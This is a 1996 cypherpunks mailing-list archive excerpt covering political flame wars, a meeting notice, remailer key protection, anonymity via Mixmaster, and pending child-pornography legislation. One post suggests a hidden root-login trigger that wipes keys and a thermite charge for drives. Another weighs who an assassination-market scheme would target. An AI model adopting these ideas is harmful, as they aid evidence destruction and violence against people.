(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Fri, 7 Jun 1996 20:18:35 +0800
To: Bruce Baugh <bruce@aracnet.com>
Subject: Re: whitehouse web incident, viva la web revolution
Message-ID: <199606070603.XAA21706@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Jun 1996, Bruce Baugh, wrote:
> > Fascism [...] is a theory of economics,
> > basically, in which the state has ultimate authority over production and
> > distribution without (as in socialism) actually _owning_ the means of
> > production or distribution. .

At 11:18 AM 6/6/96 -0700, Rich Graves wrote:
>Yes, I'm afraid these ahistorical myths are widespread. What _do_ they teach
>in these schools?

As usual you display profound ignorance of history and politics.

Far from being an ahistorical myth, this is an entirely accurate description
of fascist ideology:  Or do you claim that Mussolini, Peron, etc, were not 
fascists?  Mussolini was the one who coined the name fascism.  The theory and
ideology of fascism was developed by the philosopher Giovanni Gentile, and 
there is nothing particularly racist or right wing about either Gentile or
Mussolini.

Fascism is not Republicanism on steriods, nor is it racism.  Fascism is 
basically romanticism plus socialism plus nationalism.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 7 Jun 1996 18:02:37 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous stock trades.
In-Reply-To: <9606062327.AA04162@Etna.ai.mit.edu>
Message-ID: <v03006f0caddd1c3bbce1@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


*Damn*, I'm having *fun* today...

At 7:27 PM -0400 6/6/96, hallam@Etna.ai.mit.edu got all "hermeneutic" on us:

> Well, Milton Friedman's method for saving the whale is to leave it to the
>free
> market, if people want whales in the oceans they won't buy whale meat.
>The point
> that even if no US person eats whale, a few thousand "gourmets" in Japan
>can eat
> their way through the remaining stocks of many species in a few years
>escapes
> him. So forgive me if if find you authority somewhat less than compelling.

Yes. And they're tasty, too. I try to eat animal at least once a day,
whether I need it or not.

According to your logic above, it seems that all species are *much* more
important than man. But, with most "liberal" logic, there's a paradox here.
Let's explore it bit, shall we, by looking at the other side of the balance
sheet you just created?

Tell me, Phill, what's *your* pricetag on a single *human* life? The entire
gross global product is not enough? It's this kind of, well, muzzy-headed
innumerate (yes, *Dr.* Hallam-Baker, *innumerate*) silliness that has our
intellectuals believing the hoax, put convincingly enough to get published
in "respected" academic places like "Social Text", that reality (physics,
in this case) is optional.

Can you say "Sophistry", boys and girls? I knew you could. No offense to
the, er, numerate computer science people out there, but it seems that
*Dr.* Hallam-Baker is living proof that you can get an entire *doctorate*
in the field, and not learn to count. I hate to tell you *Dr.*
Hallam-Baker, but Lamarck was wrong, too. Not to mention Lysenko. ;-).
Reality, real, honest-to-god quantitative reality, is, in fact, not
optional.

> Adam Smith makes the point rather better in his analysis of monopolies
>and how
> they affect the market. But remember that although regulations may be
>instituted
> as protectionist mechanisms that is not the only purpose that regulations
>are
> introduced.

You get what you pay for, Phill. The reason, and look it up, that we had
monopolies in *this* country was the same reason that you had monopolies
(and I count labor unions in this) in yours. They were bought and paid for
out of the government trough. So much for the integrity of government.
Frankly, I'd put myself in the hands of those eevill, greeedy, businessmen
any day. Contrary to what they taught you in the Young Pioneers, or
whatever passes for that on your side of the channel, governments not only
screw things up, they kill. Hundreds of millions of people in this century
alone.

>
> >If by "open", you mean that people can't purchase the attention of their
> >favorite politician fair and square, without having to play zero-sum games
> >with barnyard animals, then we have "open" markets. ;-).
>
> There are so many negatives in that sentence I can't figure out which way
>you
> are arguing. Certainly there are many senators, congressman etc who can be
> bought for a contribution to their election fund or a huge advance on their
> memoirs.

Feh. You're just afraid of a little predicate calculus. That looks like
perfect English to me. Even if it's pronounciation isn't quite "received".
Personally, I agree with the Bard. Twain, of course. "A politician is
someone who can take money from the rich and votes from the poor and keep
his job." I suppose if The Earl of Oxford had said it, he'd change "job"
for "head" in the last sentence, but, we live in America, where this
decade's poor is last decade's rich, and vice versa. Or it least it used to
be that way, before these innumerate Keynesians took over our economic
"policy". ;-). "Poor me another Veuve Clicot, Corruthers. I think I have
discovered another way to traitor my class."


> >Nothing personal, Phill, but it does seem like it's more a question of what
> >you're afraid of, than what *is*, right?
>
> No, it is a case of whether you are applying ideological judgements or
>prepared
> to analyse the system itself.

Now, that's the pot calling the kettle black! Phill, we all know you're the
biggest apologist the nation-state has ever had on this list. That's okay,
'cuz you're building the right technology, and someday you'll see the
light. Say AMEN, Somebody!. Sorry. Got carried away in my
techno-evangelism, there...

The point is, Phill, you don't have to pollute the minds of all these
avant-garde young cypherpunks with yesterday's news. I mean, you developed
a double-jointed neck so you could look backwards and walk forwards (*how*
does he keep from *tripping*, brothers and sisters!
It'sa*miracle*sayhalelujia!), but it doesn't mean it's evolutionary
advantageous,  a future dictatorship of the proletariat notwithstanding.
:-).

> I do not believe in the idol of the free market.

Ah. Hmm. Still doesn't get it, does he, folks. A market's not an "idol" to
"believe in", Phill, it's this amazing stuff called "reality". It's really
quite fun. You should try it sometime...

> I
> do not consider ecconomists to have justified the level of inane
>self-satisfied
> certainty about their field that they exude.

Ah. *Your* economists, Phill. Top-down, *Keynesian*,  er, crypto-Marxist,
"control" the political-economy featherheads...

The people who do *financial* economics, just like the people who do
financial cryptography, *experiment* in markets, but they aren't fool
enough to think that they can actually *control* them. Wake up and smell
the coffee, Phill. There's a reason these boys have won all the Nobels,
lately. Reality is not optional. Planned economies aren't, actually.

> I was talking to a professor at the
> Sloane school yesterday who made precisely this point.

Ah. The Sloan school. That paragon of free market thinking. Probably *Dr.*
Thurow, I bet, maybe even <*big* intake of breath> *Dr.* Samuelson?
<oooooh!>. Feh. By, the way, Phill, your appeals to authority are nothing
short of amazing. *Dr.* Hallam-Baker. "*Sloane*" school economist. Feh, and
double-Feh. Credentialism, like any appeal to authority, is the last refuge
of the incompetant. We know *you're* not incompetant, Phill. Stop acting
like somebody who is.

> Deciding what is right implies an ethical judgement.

Yup. Electrons, like prices, are actually ethical creatures, don't you
know. Feh. Next thing he's going to tell us that there's a conciousness
particle... By the way, don't start talkin' that "touch your inner child"
stuff, Phill, or I'm gonna get a two-by-four to keep you off of *mine*...

> Are you basing your
> argument on Kantian or consequentialist assumptions?

Ooooo... Deontological vs. teleological? Wow. A philosopher. Congrats,
Phill. It *does* appear you're educated. At least through first year
ethics...


> I can argue either but
> since most of my thesis is based on a logical positivist approach I'm far
>more
> sympathetic to the utilitarian point of view.

The ganglia twitch. You're making my point for me! Just because you can do
all the mental gymnastics of Gorgias (who maintained, by the way, that
nothing exists) doesn't mean that reality's, er, optional. Remember, Phill,
Gorgias is dead. Not very optional, eh?

> The free market is not in itself an ethical basis - that would be
>creating an
> ought from an is.

Ethical schmethical, Phill. The market, like the rest of physical reality,
is *real*. It is not something to be "believed" in. If you have something I
want, and I have something you want, we trade for it. There has been trade
nearly as long has there has been human artifacts or commodities to trade
with. Hell, trade happens at the *cellular* level, for christsakes, with
stochastic process, markets, if you will. How do you think oxygen transport
works? Market-driven chaos. It's an economy.

Feh! Like Phillip K. Dick said, "Reality is that which, when you change
your mind, doesn't go away." Markets are as real as next month's rent,
Phill.


> The problem which libertarian idelogues are affraid to face up
> to is that markets have required regulation to keep them open and free.

<pardon me, ladies> "Tha's all right, darlin'. I'll only put the head in."
Or, as they say (ooo, this is great!) on the gates of Auschwitz, "Arbiet
Macht Frei". Work makes you free. Freedom is Slavery, right Phill? Read any
Hayek lately? I thought not...

> Its all
> very well for people to jump up and down, stampt their feet and claim the
> opposite but this is what every government in the free world believes.

Yup. You're right, there. Every government, especially the most unfree,
believe that markets can be, *must* be controlled, to make us "free".
Notice the harder they try to "control" markets to make us "free", the more
they control *us*? Eventually they control us so much there's no more
market, Phill. Make sense now? I'll give you a hint. It's called "reality",
and it's not "optional", much less "ethical".

> The
> effects of deregulation in the savings and loans area make it unlikely any
> further experiments in that area will be tried for a while.

This is marvellous. You're making a mobius of yourself! Don't try so hard,
Phill, and you might figure this out. Look, Phill, you've taken logic,
right? Remember the informal fallacy called "false cause"? An increase in
bananna consumption causes suicide? (If you don't believe me, look at the
statistics! I swear! ;-)) Actually, the above line looks more like "Post
hoc, ergo propter hoc".  Yup, all that first-year logic was good for
something. Plain old circular reasoning. Just like the mobius strip you
made of yourself, Phill. Put that double-jointed neck to better use. You
could hurt yourself with these mental contortions...

The reason that deregulation caused so much of a problem in the savings and
loan "industry", was because the "industry" was a creature of government,
which couldn't survive, you guessed it, Phill, "reality". If you ignore
markets, like any other natural force (like, say gas laws, or
thermodynamics, or gravity) you get slapped. Hard. Reality is not optional.

The entire financial system of this country has had to be unwound from all
the regulations that people "controlling markets to make us free" bound
them up in. Starting in the early 70's with the deregulation of brokerage
commissions, through the breaking down of the two equivalents of the Bamboo
(the creation of the savings and loan "industry") and the Iron (the
Glass-Steagal Act) curtains, and, now, the abolition of interstate banking
regulation, (with the internet, you're halfway to anywhere, much to the
relief of our friends in Kentucky) we are starting to have free financial
markets in this country for the first time since we started "consolidating"
it to make it more "efficient" by both the trusts and the trust-busters,
who were really two sides of the same coin: oligopoly and state control.


You just keep it up, Phill. I'm having a great time, here. As we used to
say in Missouri, I haven't had this much fun since the hogs ate my little
brother.


Next?


Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hugh Daniel <hugh@ecotone.toad.com>
Date: Fri, 7 Jun 1996 20:55:55 +0800
To: cypherpunks-announce@toad.com
Subject: MEETING:  SF Bay area Cypherpunks meeting for June 8th
Message-ID: <199606070640.XAA14607@ecotone.toad.com>
MIME-Version: 1.0
Content-Type: text/plain



What:	Monthly meeting of San Francisco area Cypherpunks &
	Stanford PGP Club
When:	Saturday June 8th 12:00 noon
Where:	Turing Auditorium, Stanford University (Directions below)
Dinner: Fanny & Alexander's  412 Emerson, Palo Alto, +1 415 326 7183

Topics: Random, PGP Keys siging, More on Crypto GUI's, Random.

Directions:

 If you have a GPS receiver, head for 37.4296875N 122.1783752E.

 If you have excellent hearing, call 415-853-9080 and follow the ringing.

 Or, get to Stanford's Campus Drive via 280-Sand Hill or 101-El Camino
 Real-Embarcadero. From 280, take Campus Drive left (clockwise). From 101,
 take Campus Drive right (counterclockwise). Turn South (centripetal) at
 Panama Street and take an immediate left into the Jordan Quad parking lot
 (empty on weekends). Walk between Pine and Redwood Halls to Polya. 
 Turing is between Polya and Cypress. It doesn't appear on most campus
 maps, but it's there, honest. Entrance to Turing Auditorium is by the
 Pac Bell payphone sign. 

Maps:

 http://www-leland.stanford.edu/group/Transportation/PGrid4.html (parking)
 http://www.stanford.edu/gifs/campus.1620-63-4.gif (800K campus map)
 http://www.stanford.edu/home/visitors/vicinity.html (note: upside down!)

Socialized transportation:

 CalTrain to the Palo Alto station; 20-minute walk or arrange to be picked
 up by a local. 7F bus. See http://www.stanford.edu/group/Transportation/

Notes:
  The short notice is my fault, I was hoping to get some folks to talk
at the meeting and waited far too long to give up on them.

Thanks:
  Much thanks to Rich Graves and the Stanford PGP Club for the wonderful
meeting space.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Fri, 7 Jun 1996 19:34:44 +0800
To: cypherpunks@toad.com
Subject: Re: whitehouse web incident, viva la web revolution
Message-ID: <199606070652.XAA25256@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:
> As usual you display profound ignorance of history and politics.

Oops!  This entire "fascism is a form of socialism" thread started
in a troll by Detwieler
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 21:47:30 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: How can you protect a remailer's keys?
Message-ID: <199606070700.AAA22916@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>> The best solution I could come up with (and was willing to write and use)
>> is to specify the passphrase on the command line argument to the compiler

>A far better solution would be to have a long-running daemon hold the
>secret key.  The mixmaster client could talk to the key daemon through
>a unix-domain socket with the permission bits set such that only the
>mixmaster user can connect.  Each time the machine is rebooted, the
>operator must start the daemon and give it a passphrase.

>Second, if your machine is seized or someone gains unauthorized
>physical access to it, the easiest way to get a root shell is by
>rebooting single-user.  However, if the only cleartext copy of a key
>is in memory rather than in the filesystem, once the machine is
>rebooted the secret key is lost.


How about adding an "Oh s___" feature that would dump the key? You could
even tie it to a login attempt (i.e. be sneaky and rename the actual root
account to something else. Possibly hack the login client to return
"root" as the username, etc, etc to complete the illusion if they are
using TEMPEST.  Then set it so that a root login makes the daemon dump
the password)

This would have possibilities, too, if you made it react to a) certain
files in certain directories, b) certain signals or c) certain network
messages.
This would allow you to put in an innocous clear signal. Set it to a temp
file created when editing your remailer's configuration (or userlist).
Make it so that you have to conciously DISABLE security or it dumps the
password. Have an innocent program terminate it. Be able to cancel it by
sending an email (or using telnet) - this would be great if you had a
trusted friend.  Also, with some modification, you could set it to react
to an external stimulus - say a panic button? or a card lock?  You could
even have fun putting all your sensitive stuff on an external hard drive
and rigging your panic button to a) stop the remailer and b) activate the
thermite charge on the external drive.
// This was typed on a Warped PC by an equally warped Chris Adams <adamsc@io-online.com>
// The Enigman Group - We do Web Pages!
// Opinions expressed are not necessarily my own, much less another's.

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 7 Jun 1996 18:33:07 +0800
To: cypherpunks@toad.com
Subject: <<Vitamin B>> (June 6, 1996) Reality Check
Message-ID: <v03006f1faddd5ff26300@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Speak of the devil...


Cheers,
Bob Hettinga

--- begin forwarded text


To: DAILY DOSE <DAILY_DOSE@notes.worldcom.com>
From: VitaminB <VitaminB@bionomics.org>
Date:  6 Jun 96 20:31:04
Subject: <<Vitamin B>> (June 6, 1996) Reality Check
Mime-Version: 1.0

Vitamin B:
                   Your Daily Dose of Bionomics

                                           June 6, 1996



Reality Check

Everyone knows that you can't predict the future.
The question is: Can traditional economics understand
the present?

Not too many years ago, on the eve of the collapse
of the Soviet Union, the leading economics textbook
had this to say:

"The Soviet economy is proof that, contrary to what
many skeptics had earlier believed, a
socialist command economy can function and
even thrive."

                      -- Paul A. Samuelson, Professor emeritus, MIT
                       (in Samuelson & Nordhaus, Economics, 1989)

We wonder what "conventional wisdom" of 1996
will prove to be as, ummm, quotable in the not too
distant future.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 7 Jun 1996 20:34:54 +0800
To: janimmo@ionet.net>
Subject: Re: On the Hill: Child Porn "Morphing"
In-Reply-To: <Pine.SOL.3.91.960605065515.19215C-100000@ion1.ionet.net>
Message-ID: <Mlhv4sG00YUz4x13wH@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 5-Jun-96 Re: On the Hill: Child
Porn.. by Jeffrey A Nimmo@ionet.ne 
> I've heard of this kind of thing before. Individuals have already been 
> sent to jail for doing this, as well as doing and 
> distributing kiddie porn drawings. 
>  
> I suspect that since it's already illegal on the state level, that 
> Congress is looking into making it a federal crime to distribute them 
> over state lines via the Internet.


FYI -- I have a link to Bob Chatelle's Toni Marie Angeli "child porn"
case (photos of her kid for a Harvard class) at http://joc.mit.edu/

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 7 Jun 1996 20:57:45 +0800
To: hallam@ai.mit.edu>
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <4p370g$r77@life.ai.mit.edu>
Message-ID: <Ilhv_bu00YUzIx19wP@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 5-Jun-96 Re: whitehouse web
incident.. by Hallam-Baker@ai.mit.edu 
> I find Meeks' style somewhat tiresome. It is tabloid jornalism
> rather than reasoned argument. His dislike for the Clinton is 
> well known - he recently accused the administration of being
> fascist. I know of no evidence that the Clinton administration

Phillip:

I'll let Brock defend himself. I will, however, say that my
conversations with him indicate that he probably dislikes Dole and
Clinton equally -- or, if you prefer, likes one as much as the other.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 7 Jun 1996 23:05:59 +0800
To: janimmo@ionet.net>
Subject: Re: On the Hill: Child Porn "Morphing"
In-Reply-To: <Pine.SOL.3.91.960605153106.26199C-100000@ion1.ionet.net>
Message-ID: <wlhvNja00YUz0xgNAP@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 5-Jun-96 Re: On the Hill: Child
Porn.. by Jeffrey A Nimmo@ionet.ne 
> I believe that like all porn, it's a reasonability issue. If a 
> "reasonable" person would believe that the person depicted in the drawing 
> or morph to be underage, that it's illegal. I'm not sure, but I'll bet 
> Sternlight would have an opinion. Anyone care (dare) to ask?

Read the legislation. I have the text of S.1237 in front of me now.

Child pornography is any depiction, including electronic, where:

(A) the production of such visual depiction involves the use of a minor
engaging in sexually explicit conduct;

(B) such visual depiction is, or appears to be, of a minor engaging in
sexually explicit conduct;

(C) such visual depiction is advertised, promoted, presented, or
distributed in such a manner that conveys the impression that the
material is or contains a visual depiction of a minor engaging in
sexually explicit conduct.

Anyone who "knowingly receives or distributes" it in any way over state
lines "including by computer" will be fined and given a 5 to 15 year
vacation at Club Fed.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 7 Jun 1996 20:40:07 +0800
To: janimmo@ionet.net>
Subject: Re: On the Hill: Child Porn "Morphing"
In-Reply-To: <Pine.SOL.3.91.960605153106.26199C-100000@ion1.ionet.net>
Message-ID: <IlhvdRi00YUz4xgRNx@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I should have said that (A) (B) and (C) are linked by OR, not by AND.

-Declan

Excerpts from outbox: 7-Jun-96 Re: On the Hill: Child Porn.. by =>
cypherpunks@toad.com 
> (A) the production of such visual depiction involves the use of a minor
> engaging in sexually explicit conduct;
>  
> (B) such visual depiction is, or appears to be, of a minor engaging in
> sexually explicit conduct;
>  
> (C) such visual depiction is advertised, promoted, presented, or
> distributed in such a manner that conveys the impression that the
> material is or contains a visual depiction of a minor engaging in
> sexually explicit conduct.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 7 Jun 1996 19:56:05 +0800
To: David Rosoff <jimbell@pacifier.com>
Subject: Re: [Off-Topic]  "Curfews"
Message-ID: <9606070544.AB18682@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On  6 Jun 96 at 17:55, jim bell wrote:

> At 02:47 PM 6/6/96 +0000, Jean-Francois Avon wrote:
> >On  6 Jun 96 at 11:19, jim bell wrote:
> >
> >
> >> >>I _do_ believe, however, that the number of people
> >> >>unjustifiably targeted will be rather low. <snip>  Retaliation
> >> >>is possible, in
> >> >> that case.
> >
> >Sorry Jim, I did not get that at all in the past.  I assumed a
> >context where the inner workings of AP would not be well understood
> > by the population while here, you seems to indicate that everybody
> > would operate under the threat / deterrance of mutual anihilation
> >principle.
> 
> Hmmm...  sorry, I thought that was obvious.  Well, perhaps not
> "obvious," but it's one of those facts that will become second
> nature to people once AP starts up.  

Well, yes and no.  What made me change my mind is when I tried to see 
the situation from the standpoint of a guy from a thuggish mentality. 
Actually, it might not deter somebody else acting on the spur of the 
moment.  Take a typical harsh divorce situation where peoples act in 
the most surprisingly irrationnal way.  I think that ex-husbands or 
wifes would get targeted more than their fair share, and quite often, 
without any reasonable cause.

JF
 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 7 Jun 1996 20:32:40 +0800
To: cypherpunks@toad.com
Subject: Re: ID this 31173 NCR keyboard
Message-ID: <199606070859.BAA24803@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Does it have any identifying numbers?
NCR OEMed a line of ADDS Viewpoint terminals for a while,
and while the numbers no longer come to mind
(unless they're like 2920), they might look familiar
if I saw them.  This keyboard sample doesn't look
quite like them, though.  Most of their keyboards
like that were for terminals, not for PCs.
Are the connectors even PC-like?

Also, if there are function keys through F20, it might very
well be a 3270-emulator of some sort.

At 01:52 PM 6/6/96 -0700, you wrote:
>Oops.  I wrote that just looking at the keyboard.
>Picked it up at Seattle's Ex-Pc for $3.
>It's so old, I think it requires a non-PC BIOS.
>No manual, labels etc.
>
>Anyone have a clue as to what this is:
>
>NCR
>
>F1 F2          [...]               F18 F19 F20/RESET|
>ESC            [...]     TAB             |[five direction keys]
>CONTROL Q      [...]     }/] CONTROL     |CLR 7 8 9 /
>CAPS_LOCK A    [...]      ~/` |NEW       |  - 4 5 6 *
>[up] |/\ Z     [...]   [upup] |LINE      |  + 1 2 3 |NEW
>               [space]                   |  0_ 00 . |LINE
>
>It was designed for easily customizing your keytable,
>being an actual flat terminal with square keys easily
>pulled out and interchanged.
>
>The back of the keyboard has three switches for
>the boolean selection of languages: US English,
>UK/Int. English, French, German, Swedish/Finnish,
>Danish/Norwegian, Spanish, Italian.
>
>So, where to get a NEW keyboard like this:
>
>FLAT, with a full set of SQUARE, EASILY pulled out keys.
>
>
>
#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Rescind Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 7 Jun 1996 20:59:43 +0800
To: cypherpunks@toad.com
Subject: Re: WWW servers.
Message-ID: <199606070859.BAA24808@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn:
>> Does there currently exist a system which permits webservers to restrict 
>> access to clients who have a given certification?

Sameer:
>	Yup.
....
>	=) Stronghold: The Apache-SSL-US, coupled with XCert
>Sentry. What else?

Of course, there's a simpler approach; restrict access to people
who have logins and passwords, and only give those to people
who have the certification...
#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Rescind Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 7 Jun 1996 20:32:53 +0800
To: cypherpunks@toad.com
Subject: Re: Cost of brute force decryption
Message-ID: <199606070859.BAA24817@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:44 PM 6/5/96 -0700, you wrote:
>> > 	"For example a 40-bit key takes about $10,000 worth of supercomputer 
>> > time and two weeks to crack.  Although this key may be adequate to 
>> > protect my checking account, it's probably not large enough for the 
>> > accounts of a major corporation.
>> The figures look familiar.  No references around.  I'm not sure it would 
>> require a whole two weeks for 40-bits, though.  Possibly less than a 
>> day? (Or was that why you asked baout the figures?)

It was from The Newspapers, of course :-)  The "$10,000 of supercomputer time"
was in an initial press release description by somebody in Netscape or RSA
after the RC4/40 Netscape crack, and was way high.  (Check Altavista...)

However, it's not too far off for the cost of a DES crack, where "supercomputer"
is defined as "a special-purpose cracking machine" rather than "a Cray"..
(Maybe an order of magnitude high for that.)  And the description of
$10,000 as "maybe enough to protect my checking account, but not large enough
for the accounts of a major corporation" is about right.  
#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Rescind Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Fri, 7 Jun 1996 17:19:17 +0800
To: cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
In-Reply-To: <199606070328.UAA19061@mail.pacifier.com>
Message-ID: <19960607040506.11096.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell writes:

 > My impression is that it is frequently the pacifist-types who get us into 
 > war, because they start the process out by tolerating actions by others that 
 > turn into more serious actions, etc.  You know, the appeasers.  Are you an 
 > appeaser?

A quote from Donald Wetzel's book Pacifist:

The pacifist is often asked what he would do in the event the United
States were to be conquered by a hostile power.  The assumption on the
part of the questioner is almost always that we would simply assume
the proper position in which best to have our asses kicked.  I suggest
that anyone who believes that such would be the pacifist response to
the imposition in America of an oppressive, authoritarian
rule--foreign or domestic--should consult the prison authorities that
were in power when America's prisons were host to some six thousand
pacifists.  I am sure it will be found that we have not been
forgotten.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Fri, 7 Jun 1996 18:29:57 +0800
To: cypherpunks@toad.com
Subject: Re: Multiple Remailers at a site?
In-Reply-To: <19960604232157.2053.qmail@ns.crynwr.com>
Message-ID: <19960607042143.11138.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


nelson@crynwr.com writes:
 > Scott Brickner writes:

 >  > The "to" and "from" values that the traffic analyst will be using
 >  > are the IP addresses in the packets.  It doesn't matter whether
 >  > mixmaster, cypherpunks, or penet remailers are used, they still use
 >  > IP addresses.
 > 
 > Sure *does* matter.  There's no computationally feasible way to
 > associate one mixmaster message with another.  The only way you can
 > get a clue is by analyzing who sends mail into and out of the
 > mixmaster system.  If both of your endpoints are within the mixmaster
 > system, you have no entering or exiting mail to analyze.  It doesn't
 > matter if the mixmaster remailers are on the same or different systems.

Scott indicates, in private mail, that he needs another, clearer,
explanation.  Okay, here goes:

A is sender, B is recipient, M is mixmaster remailer network, W is
watcher.

A Mixmaster system (there can be more than one, although there is
currently only one published Mixmaster system of remailers) acts as a
single node for the purposes of traffic analysis.  Imagine, if you
will, a remailer that everyone trusts implicitly.  Why would you need
any other remailers??  All W can see is incoming mixmaster messages
(lets you identify A), and outgoing ASCII messages (lets you identify
B).  If W can correlate traffic between A and B, he does it by
watching what happens between A and B, not being privy to the
internals of M.

Now obviously there is no single trustable M.  So, you create many Ms,
who move traffic between themselves.  Let's assume that only one of
them is trustable (M') and happens to be used by A to send a message
to B.  W STILL doesn't know what happens inside M' and has no more
information about the correlation between the message sent by A and
the message received by B than in the first case.

Do you see now, Scott?  Adding mixmasters doesn't need to make traffic
analysis harder (it does, but it doesn't need to).  It makes finding
an M that you trust easier.  And to that end, it doesn't matter if
those mixmasters are all running on the same host or not.

Now, my point about increased security by sender and/or receiver
running a Mixmaster remailer is that W has an easy time identifying A
and B because he can see that A sends a mixmaster message, and B
receives an ASCII message from a mixmaster remailer.  If either A or B
is running a mixmaster, W is denied knowledge that A or B even exists.
He MUST assume that anyone running a remailer is receiving or sending
some or all of the messages.  Message counting (looking for a delta
implying an internally received or transmitted message) is no help.
Since mixmaster happily ignores bogus messages, I could receive a
message, fill its packets with junk, send them one or more hops, and
let someone *else* be under suspicion of having received a message.

As an aside, the TLAs *are* looking for A's and B's.  They spend
millions of dollars a year on telephone traffic analysis.  We MUST
assume that they would spend tens of thousands of dollars a year on
email traffic analysis.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 7 Jun 1996 21:17:13 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Hackers prevent Crackers!
Message-ID: <199606070435.VAA21846@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: Cypherpunks <cypherpunks@toad.com>
              Black Unicorn <unicorn@schloss.li>


** Reply to note from Black Unicorn <unicorn@schloss.li> 06/06/96   
03:05am -0400  
  
